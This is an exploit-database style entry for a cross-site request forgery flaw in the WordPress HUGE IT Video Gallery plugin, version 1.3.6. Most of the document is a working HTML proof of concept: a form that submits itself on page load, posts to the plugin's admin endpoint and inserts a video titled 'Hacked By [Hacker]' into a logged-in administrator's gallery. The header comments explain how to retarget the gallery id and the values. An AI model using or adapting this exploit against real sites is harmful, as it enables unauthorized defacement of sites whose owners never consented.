<!--
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : WordPress HUGE IT Video Gallery CSRF Vulnerability
[+]
[+] Version : 1.3.6
[+]
[+] Exploit Author : The Nonexistent
[+]
[+] Vendor Homepage: https://wordpress.org/plugins/gallery-video/
[+]
[+] Software Link: https://downloads.wordpress.org/plugin/gallery-video.1.3.6.zip
[+]
[+] Date: 8 Sep 2015
[+]
[+] Tested On : Kali Linux , BackTrack , Windows 8.1
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] #You Can Modify The Form Values And The Address(Witch Has The Gallery's Id),
[+] You Can Also Change The Video Id In Target URL.
[+]
[+] #You Can Add A New Video To Video Gallery With This Vulnerability
[+]
[+] #Change The [YOUTUBE LINK HERE] To Whatever You Want.
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]Exploit Code:
-->
<body onload="document.exploit.submit();">
<form method="post" action="host/wp-admin/admin.php?page=videogallerys_huge_it_videogallery&task=videogallery_video&id=2&closepop=1" name="exploit">
<input type="text" id="huge_it_add_video_input" name="huge_it_add_video_input" value="[YOUTUBE LINK HERE]"/>
<button class='save-slider-options button-primary huge-it-insert-video-button' id='huge-it-insert-video-button'>Insert Video</button>
<div id="add-video-popup-options">
<div>
<div>
<label for="show_title">Title:</label>
<div>
<input name="show_title" type="text" value="Hacked By [Hacker]"/>
</div>
</div>
<div>
<label for="show_description">Description:</label>
<textarea id="show_description" name="show_description"></textarea>
</div>
<div>
<label for="show_url">Url:</label>
<input type="text" name="show_url" value="Hacked By [Hacker]" />
</div>
</div>
</div>
</form>
</body>
<!--
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Vulnerable Pages :
[+]
[+] host/wp-admin/admin.php?page=videogallerys_huge_it_videogallery
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered by : The Nonexistent
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
-->